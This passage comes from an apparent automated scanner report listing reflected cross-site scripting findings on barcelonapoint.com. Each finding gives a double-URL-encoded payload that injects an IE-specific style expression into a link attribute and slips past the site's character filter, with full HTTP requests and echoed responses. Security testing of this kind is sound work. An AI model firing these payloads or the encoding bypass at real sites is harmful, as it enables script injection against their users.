User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.barcelonapoint.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:14:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 16824
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/en/blog/wp-content/themes/barcelonapoint-en/scripts/timthumb.php67034"style="x:expression(alert(1))"ecb05724ee4?src=http://www.barcelonapoint.com/en/blog/files/2011/09/boat-show-FEATURED-300x199.jpg&amp;h=45&amp;w=45" target="_blank">
...[SNIP]...

2.141. http://www.barcelonapoint.com/en/popup/email_friend/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /en/popup/email_friend/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99326%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224064588beb0 was submitted in the REST URL parameter 1. This input was echoed as 99326"style="x:expression(alert(1))"4064588beb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en99326%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224064588beb0/popup/email_friend/ HTTP/1.1
Host: www.barcelonapoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:19:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/en99326"style="x:expression(alert(1))"4064588beb0/popup/email_friend/" target="_blank">
...[SNIP]...

2.142. http://www.barcelonapoint.com/en/popup/email_friend/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /en/popup/email_friend/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f18b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522685f1019ffa was submitted in the REST URL parameter 2. This input was echoed as 9f18b"style="x:expression(alert(1))"685f1019ffa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en/popup9f18b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522685f1019ffa/email_friend/ HTTP/1.1
Host: www.barcelonapoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:19:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/en/popup9f18b"style="x:expression(alert(1))"685f1019ffa/email_friend/" target="_blank">
...[SNIP]...

2.143. http://www.barcelonapoint.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8afb%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228f01e2895be was submitted in the REST URL parameter 1. This input was echoed as c8afb"style="x:expression(alert(1))"8f01e2895be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /c8afb%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228f01e2895be HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3; __utma=196875455.901863034.1317388358.1317388358.1317388358.1; __utmb=196875455.1.10.1317388358; __utmc=196875455; __utmz=196875455.1317388358.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:13:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15810
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/c8afb"style="x:expression(alert(1))"8f01e2895be" target="_blank">
...[SNIP]...

2.144. http://www.barcelonapoint.com/images/barrio_11.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /images/barrio_11.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1179%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522beb22b678e0 was submitted in the REST URL parameter 1. This input was echoed as d1179"style="x:expression(alert(1))"beb22b678e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /imagesd1179%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522beb22b678e0/barrio_11.png HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.barcelonapoint.com/apartment_results.php?lang=en&&token=3342e7c89333e3aeb8a546914650b070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3; __utma=196875455.901863034.1317388358.1317388358.1317388358.1; __utmb=196875455.2.10.1317388358; __utmc=196875455; __utmz=196875455.1317388358.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:19:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15930
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/imagesd1179"style="x:expression(alert(1))"beb22b678e0/barrio_11.png" target="_blank">
...[SNIP]...

2.145. http://www.barcelonapoint.com/images/barrio_11.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /images/barrio_11.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb1e8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cebabbf5341 was submitted in the REST URL parameter 2. This input was echoed as fb1e8"style="x:expression(alert(1))"cebabbf5341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /images/barrio_11.pngfb1e8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cebabbf5341 HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.barcelonapoint.com/apartment_results.php?lang=en&&token=3342e7c89333e3aeb8a546914650b070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3; __utma=196875455.901863034.1317388358.1317388358.1317388358.1; __utmb=196875455.2.10.1317388358; __utmc=196875455; __utmz=196875455.1317388358.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:19:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15930
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/images/barrio_11.pngfb1e8"style="x:expression(alert(1))"cebabbf5341" target="_blank">
...[SNIP]...

2.146. http://www.barcelonapoint.com/images/barrio_11.png [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /images/barrio_11.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea5f7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223c6bbae1004 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea5f7"style="x:expression(alert(1))"3c6bbae1004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /images/barrio_11.png?ea5f7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223c6bbae1004=1 HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.barcelonapoint.com/apartment_results.php?lang=en&&token=3342e7c89333e3aeb8a546914650b070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3; __utma=196875455.901863034.1317388358.1317388358.1317388358.1; __utmb=196875455.2.10.1317388358; __utmc=196875455; __utmz=196875455.1317388358.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:19:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15948
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/images/barrio_11.png?ea5f7"style="x:expression(alert(1))"3c6bbae1004=1" target="_blank">
...[SNIP]...

2.147. http://www.barcelonapoint.com/includes/service/ServiceRequest.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /includes/service/ServiceRequest.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2823a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc7ad40ada9 was submitted in the REST URL parameter 1. This input was echoed as 2823a"style="x:expression(alert(1))"cc7ad40ada9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes2823a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc7ad40ada9/service/ServiceRequest.php HTTP/1.1
Host: www.barcelonapoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:19:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 16020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/includes2823a"style="x:expression(alert(1))"cc7ad40ada9/service/ServiceRequest.php" target="_blank">
...[SNIP]...

2.148. http://www.barcelonapoint.com/includes/service/ServiceRequest.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /includes/service/ServiceRequest.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7d82%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252275ac574aa365db623 was submitted in the REST URL parameter 1. This input was echoed as d7d82"style="x:expression(alert(1))"75ac574aa365db623 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includesd7d82%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252275ac574aa365db623/service/ServiceRequest.php?action=getMyList HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
Origin: http://www.barcelonapoint.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.barcelonapoint.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3; __utma=196875455.901863034.1317388358.1317388358.1317388358.1; __utmb=196875455.1.10.1317388358; __utmc=196875455; __utmz=196875455.1317388358.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:13:59 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 16158
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/includesd7d82"style="x:expression(alert(1))"75ac574aa365db623/service/ServiceRequest.php?action=getMyList" target="_blank">
...[SNIP]...

2.149. http://www.barcelonapoint.com/includes/service/ServiceRequest.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /includes/service/ServiceRequest.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c682%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223414df360a288b344 was submitted in the REST URL parameter 2. This input was echoed as 1c682"style="x:expression(alert(1))"3414df360a288b344 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/service1c682%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223414df360a288b344/ServiceRequest.php?action=getMyList HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
Origin: http://www.barcelonapoint.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.barcelonapoint.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3; __utma=196875455.901863034.1317388358.1317388358.1317388358.1; __utmb=196875455.1.10.1317388358; __utmc=196875455; __utmz=196875455.1317388358.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:14:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 16158
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/includes/service1c682"style="x:expression(alert(1))"3414df360a288b344/ServiceRequest.php?action=getMyList" target="_blank">
...[SNIP]...

2.150. http://www.barcelonapoint.com/includes/service/ServiceRequest.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /includes/service/ServiceRequest.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c9a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252260b6cb7f769 was submitted in the REST URL parameter 2. This input was echoed as 75c9a"style="x:expression(alert(1))"60b6cb7f769 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/service75c9a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252260b6cb7f769/ServiceRequest.php HTTP/1.1
Host: www.barcelonapoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:19:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 16020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/includes/service75c9a"style="x:expression(alert(1))"60b6cb7f769/ServiceRequest.php" target="_blank">
...[SNIP]...

2.151. http://www.barcelonapoint.com/includes/service/ServiceRequest.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /includes/service/ServiceRequest.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea6fe%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522340b0ad87b28b5c88 was submitted in the REST URL parameter 3. This input was echoed as ea6fe"style="x:expression(alert(1))"340b0ad87b28b5c88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/service/ServiceRequest.phpea6fe%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522340b0ad87b28b5c88?action=getMyList HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
Origin: http://www.barcelonapoint.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.barcelonapoint.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3; __utma=196875455.901863034.1317388358.1317388358.1317388358.1; __utmb=196875455.1.10.1317388358; __utmc=196875455; __utmz=196875455.1317388358.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:14:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 16158
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
